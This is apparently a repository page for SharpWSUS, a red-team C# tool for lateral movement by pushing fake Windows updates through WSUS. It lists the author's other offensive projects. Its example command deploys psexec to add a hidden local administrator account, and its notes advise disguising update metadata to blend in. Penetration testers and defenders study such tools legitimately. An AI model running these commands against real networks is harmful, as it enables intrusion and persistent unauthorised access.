• Stars
    star
    429
  • Rank 101,271 (Top 2 %)
  • Language
    C#
  • Created over 2 years ago
  • Updated about 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

SharpWSUS

SharpWSUS is a CSharp tool for lateral movement through WSUS. There is a corresponding blog (https://labs.nettitude.com/blog/introducing-sharpwsus/) which has more detailed information about the tooling, use case and detection.

Credits

Massive credit to the below resources that really did 90% of this for me. This tool is just an enhancement of the below for C2 reliability and flexibility.

Help Menu

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team


Commands listed below have optional parameters in <>.

Locate the WSUS server:
    SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:
    SharpWSUS.exe inspect

Create an update (NOTE: The payload has to be a windows signed binary):
    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MSRC] /description:[description] /url:[url]>

Approve an update:
    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>

Check status of an update:
    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete update and clean up groups added:
    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>

Example Usage

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

Notes

  • Binary has to be windows signed, so psexec, msiexec, msbuild etc could be useful for lateral movement.
  • The metadata on the create command is not needed, but is useful for blending in to the environment.
  • If testing in a lab the first is usually quick, then each subsequent update will take a couple hours (this is due to how windows evaluates whether an update is installed already or not)

More Repositories

1

PoshC2

A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
PowerShell
1,767
star
2

xss_payloads

Exploitation for XSS
PHP
697
star
3

PoshC2_Old

Powershell C2 Server and Implants
PowerShell
574
star
4

SharpSocks

Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
C#
472
star
5

RunPE

C# Reflective loader for unmanaged binaries.
C#
416
star
6

SimplePELoader

In-Memory PE Loader
C++
366
star
7

Prowl

Python
275
star
8

ETWHash

C# POC to extract NetNTLMv1/v2 hashes from ETW provider
C#
248
star
9

MalSCCM

C#
241
star
10

scrounger

Mobile application testing toolkit
Python
237
star
11

ShellcodeMutator

Python
232
star
12

Aladdin

C#
212
star
13

Tartarus-TpAllocInject

C++
172
star
14

RunOF

C#
138
star
15

Invoke-PowerThIEf

The PowerThIEf, an Internet Explorer Post Exploitation library
PowerShell
130
star
16

DLLInjection

DLL Injection Library & Tools
C++
70
star
17

SharpConflux

C#
63
star
18

zeropress

A dumb script for finding dumb coding errors in WordPress plugins
Python
55
star
19

CVE-2024-20356

This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.
Python
47
star
20

CVE-2024-25153

Proof-of-concept exploit for CVE-2024-25153.
Python
43
star
21

defensive-scripts

Defence Against the Dark Arts
34
star
22

InlineFunctionHooking

Windows Inline function hooking library targeted at MSVC
C
28
star
23

pwnlyoffice

Exploit ONLYOFFICE Implementations
JavaScript
24
star
24

PoshC2_IOCs

A list of IOCs applicable to PoshC2
YARA
23
star
25

SyscallsExtractor

C#
23
star
26

logparser

SQL scripts for querying event logs
21
star
27

yasha

Python
18
star
28

metasploit-modules

Modules created by Nettitude for Metasploit
Ruby
12
star
29

hyperv-driver-thread-detection-poc

hyperv-driver-thread-detection-poc
C#
11
star
30

PoshC2_Shellcode

Supporting projects for PoshC2
C
11
star
31

CVE-2022-23253-PoC

CVE-2022-23253 PoC
Python
5
star
32

PoshC2_Linux_Implant

C
4
star
33

PBind

PBind payloads for PoshC2
C#
2
star
34

secure-development-training

PHP
2
star
35

PoshC2_Core

C#
1
star
36

FComm

FComm payloads for PoshC2
C#
1
star